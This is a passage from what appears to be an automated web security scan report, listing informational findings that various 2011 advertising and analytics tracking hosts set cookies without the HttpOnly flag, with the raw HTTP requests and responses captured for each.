Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:10:02 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:10:02 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:02 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:02 GMT; path=/; domain=.directtrack.com
Location: http://www.nextadvisor.com/pmid?kw=id gid9a identity theft resource_ordering34--2011-04-23--20-10-01CD1
X-Server-Name: www@dc1dtweb59
Content-Length: 0
Content-Type: text/html


18.369. http://partners.nextadnetwork.com/z/518/CD1/idf+903230053  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/518/CD1/idf+903230053

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/518/CD1/idf+903230053 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:09:53 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:53 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:53 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:53 GMT; path=/; domain=.directtrack.com
Location: http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf 903230053CD1
X-Server-Name: www@dc1dtweb168
Content-Length: 0
Content-Type: text/html


18.370. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815; Domain=.33across.com; Expires=Mon, 23-Apr-2012 16:35:02 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Sun, 24 Apr 2011 16:35:02 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

18.371. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=2451 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303533727_1660:354055; uid=1_1303533727_1303179323923:6792170478871670; kwd=1_1303533727; sit=1_1303533727_3236:118:0_782:354404:354055; cre=1_1303533727; bpd=1_1303533727; apd=1_1303533727; scg=1_1303533727; ppd=1_1303533727; afl=1_1303533727

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:52 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303691572_1660:511900; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: uid=1_1303691572_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: kwd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: sit=1_1303691572_2451:0:0_3236:157963:157845_782:512249:511900; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: cre=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: bpd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: apd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: scg=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: ppd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: afl=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 00:32:52 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 281

<!-- campaign #7637 is NOT eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(
...[SNIP]...

18.372. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102119&mt_adid=100377&v1=&v2=&v3=&s1=&s2=&s3=&ord=503629049 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303614126

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6317 25367
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 24 Apr 2011 03:08:32 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1303614512; domain=.mathtag.com; path=/; expires=Mon, 23-Apr-2012 03:08:32 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

18.373. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=936598256;fpan=u;fpa=;ns=1;url=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN553.158901.DATAXU%2FB5114832.6%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3DNERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy%3F;ref=http%3A%2F%2Fcdn.w55c.net%2Fi%2F0RkPQrQRFy_1341446950.html%3Frtbhost%3Drts-rr11.sldc.dataxu.net%26btid%3DNERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy%26ei%3DGOOGLE_CONTENTNETWORK%26wp_exchange%3DTbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA%26euid%3DQ0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn%26slotid%3DMQ%26fiu%3DMEYzTllTc2l3dw%26ciu%3DMFJrUFFyUVJGeQ%26reqid%3DNERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI%26ccw%3DSUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4%26bp%3D138%26zc%3DNzUyMDc%26v%3D0%26s%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_728_90_b.php%26;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303658406247;tzo=300;a=p-54O-h3cYFO1Zc;media=ad;labels=_imp.adserver.doubleclick%2C_imp.publisher.62154145%2C_imp.placement.234084063%2C_imp.creative.41537449 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EMcAFu8kjVmtjIMLyxuBAS0BywaBkQDe0ki5E_-CTDDIYIIKvTCkMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ib.adnxs.com/seg?add_code=impx-15953&member=30
Set-Cookie: d=EK4AFu8kjVmtjIMLyxuBATEBywaBkQDe0kyka4WR_4JMMMhgggq9MKQw; expires=Sat, 23-Jul-2011 15:20:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 24 Apr 2011 15:20:18 GMT
Server: QS


18.374. http://pixel.quantserve.com/pixel/p-01ujhAj7lIRP-.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-01ujhAj7lIRP-.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-01ujhAj7lIRP-.gif?r=101063243 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EFcAFu8kjVmtjIMLyxuBATUBzAaBsQDe0kyka4WR_4JMMMhgggv-JutlpDA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ib.adnxs.com/seg?add_code=impx-50185&member=30
Set-Cookie: d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw; expires=Sun, 24-Jul-2011 01:39:23 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 01:39:23 GMT
Server: QS


18.375. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fd49cb9a7122f52 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; ses2=12801^1&12142^1; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C0%2C1%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fd49cb9a7122f52; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

18.376. https://portal.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: portal_=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Set-Cookie: portal_hash=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

18.377. http://positivesearches1.app6.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://positivesearches1.app6.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: positivesearches1.app6.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 496
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=0KM0zrEhzQEkAAAAZTQwOGU2MTAtMGU3Ni00MDM2LTg1MTEtMDIxNzk3YzIyY2My0; expires=Tue, 24-Apr-2012 00:33:01 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=a2dd46d8-2ea8-43a4-bfe0-4b8ea6578157; domain=positivesearches1.app6.hubspot.com; expires=Sat, 24-Apr-2021 05:00:00 GMT; path=/; HttpOnly
Date: Mon, 25 Apr 2011 00:33:00 GMT
Set-Cookie: HUBSPOT39=252777644.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 12418;
var hsWeekEndsIn = 12418;
var hsMonthEndsIn = 530818;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-04-24 20:33:0
...[SNIP]...

18.378. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=BDCxiNImEXo_HTPxCteYHrb_BGgsLOT9mPTO8gIYFdmr7x1BP_jQEEW2U7W2VkKeBr2cjrIkhngtwKA4Ni19Eg&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MRT/iview/302482408/direct;wi.160;hi.600/01/238930674?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB2Z05xT-0TaKrMcjhlQez64SsA-SwnI4C9I7TmxvcrtnbP7DkgAEQARgBINmitw84AFDRxLm5______8BYMnug4jwo-wSsgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RLgCGMACBMgClLCGGKgDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA%26num%3D1%26sig%3DAGiWqtx-OJWvpbCS73hYg0hYLIULa971Wg%26client%3Dca-pub-6888065668292638%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=CMHOO7uf_udLLq9eGtJ3PdQJcQ_K22BQHXQ-dT6incxd6ISB_q_vS5rapRhLZ6kjvFBMD_r71JCvgjjawylbas-n3UVMoc2HfetiqdcGK7-MifLpV7fqak3Dns_efbQIZw0xnwcn-ju7SUW_27p2BuIIvMb-MRyDgs7z-nEGMqA; fc=NVeBshHSVnoUxhcixGrBhDuuhRKDd8vnh1xheKiYPKd3AL7Gx9Az1OHn7o3KNmBFGJEeoEGIaoMAXW2vTWlmm73wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=l6Ri52mPIpyGluW6-u2eGbfU8wOnNN9b_0n8BcAiIkpsOep8dC-MOu_Vn8saV8FGlv3EoXMDiG_3MOMNAZoQ8Zp8ton9qyytc3wJggY-XZ9xG021Bg3dVOVsjw-527DQ-lQ43F1Ri9EfKWgyMuSUJA7iVTPo6xLeW82rZAWcMMn-0ge5B6bX-Jw_BSdBMhaJRceopGJpc2YjAVLP6yBcU90N40phyJxywLIOGGEKSw8ZoVJuroHICj-FGi_cY7Rd52uo68R-HwHiqzs9rfgwUoBC0YF5sFftF8hFGep-tyiZF_0ohQEDeKLZrcUSOm6EjZzcmrNZG35Zw0ulgG_qszvIkIaZ0ryfyTud8M9ew8c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:10 GMT; Path=/
Set-Cookie: pf=YRmUG_egcxJ1jioCGx9tK2GrdtjyNIcCUmgOmzrRm97N9THTGeI-F8umf6rZIImP1NBFClVarOFa_WCW8k8jSVduSr5oqf0X_-pWPDxsGEPbN4SL51TigxAiJq-uj4aXHRoJFl3mPlckn1wpclzDLQ7iVTPo6xLeW82rZAWcMMn-0ge5B6bX-Jw_BSdBMhaJRceopGJpc2YjAVLP6yBcU90N40phyJxywLIOGGEKSw8ZoVJuroHICj-FGi_cY7Rd52uo68R-HwHiqzs9rfgwUoBC0YF5sFftF8hFGep-tyiZF_0ohQEDeKLZrcUSOm6EjZzcmrNZG35Zw0ulgG_qswliy_Srlk4j3LntAATjDnkHFvcFf7JzHxAZo9UZBcv7F6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 24 Apr 2011 15:23:10 GMT

GIF89a.............!.......,...........D..;

18.379. http://r.vertster.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.vertster.com
Path:   /track/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/?recipe_id=68334&action_type=view&campaign_id=2630&thirdParty=true&page_id=1192&ipaddress=173.193.214.243&visit_id=46276302&url=http%3A//www.infusionsoft.com/&kw=&ref=&hostname=www.infusionsoft.com&os=Windows&browser=Chrome%2010&day=0&hour=20&daytype=Weekend&daytime=Evening&vvar=Not%20Set HTTP/1.1
Host: r.vertster.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
